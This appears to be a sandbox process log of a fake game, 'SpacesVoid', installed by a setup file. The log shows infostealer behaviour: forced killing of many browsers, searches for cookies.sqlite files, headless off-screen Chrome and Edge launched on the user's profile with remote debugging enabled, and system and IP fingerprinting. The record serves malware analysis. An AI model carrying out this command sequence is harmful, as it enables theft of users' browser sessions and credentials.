Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM brave.exe /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM firefox.exe /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM opera.exe /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM kometa.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM orbitum.exe /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM centbrowser.exe /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM chrome.exe /F
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM 7star.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM sputnik.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM vivaldi.exe /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM epicprivacybrowser.exe /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM uran.exe /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM yandex.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM iridium.exe /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "where /r . cookies.sqlite"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM msedge.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM opera.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM firefox.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM 7star.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\where.exe where /r . cookies.sqlite
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM uran.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM vivaldi.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM iridium.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM brave.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM sputnik.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM centbrowser.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM yandex.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM kometa.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM epicprivacybrowser.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM orbitum.exe /F
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM chrome.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:/Program Files/Google/Chrome/Application/chrome.exe" --restore-last-session --remote-debugging-port=9184 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory=Default --window-position=-32000,-32000 --headless https://mail.google.com
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1680 --field-trial-handle=1496,i,17456217344094680572,15574627026169771405,262144 --disable-features=PaintHolding /prefetch:8
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM chrome.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM msedge.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:/Program Files (x86)/Microsoft/Edge/Application/msedge.exe" --restore-last-session --remote-debugging-port=9184 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory=Default --window-position=-32000,-32000 --headless https://mail.google.com
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1884 --field-trial-handle=1456,i,1191886184323445793,12446102649480836012,262144 --disable-features=PaintHolding /prefetch:3
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM msedge.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "where /r . *.sqlite"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\where.exe where /r . *.sqlite
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM Steam.exe /F
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM javaw.exe /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM javaw.exe /F
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq SpacesVoid.exe" /FO csv \| "C:\Windows\system32\find.exe" "SpacesVoid.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq SpacesVoid.exe" /FO csv	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe "C:\Windows\system32\find.exe" "SpacesVoid.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe "C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\unrealgame" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1728 --field-trial-handle=1732,i,2577388129059311954,1337819537177688922,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe "C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\unrealgame" --mojo-platform-channel-handle=2416 --field-trial-handle=1732,i,2577388129059311954,1337819537177688922,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list \| find /i "Speed""
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM brave.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM firefox.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM opera.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM kometa.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM orbitum.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM centbrowser.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM 7star.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM sputnik.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM vivaldi.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM epicprivacybrowser.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM uran.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM yandex.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM iridium.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "where /r . cookies.sqlite"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM chrome.exe"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:/Program Files/Google/Chrome/Application/chrome.exe" --restore-last-session --remote-debugging-port=9184 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory=Default --window-position=-32000,-32000 --headless https://mail.google.com
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM chrome.exe"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM msedge.exe"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:/Program Files (x86)/Microsoft/Edge/Application/msedge.exe" --restore-last-session --remote-debugging-port=9184 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory=Default --window-position=-32000,-32000 --headless https://mail.google.com
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM msedge.exe"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "where /r . *.sqlite"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM javaw.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl http://api.ipify.org/ --ssl-no-revoke
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic bios get smbiosbiosversion
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic MemoryChip get /format:list
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "Speed"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM chrome.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM msedge.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM brave.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM firefox.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM opera.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM kometa.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM orbitum.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM centbrowser.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM 7star.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM sputnik.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM vivaldi.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM epicprivacybrowser.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM uran.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM yandex.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM iridium.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\where.exe where /r . cookies.sqlite
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
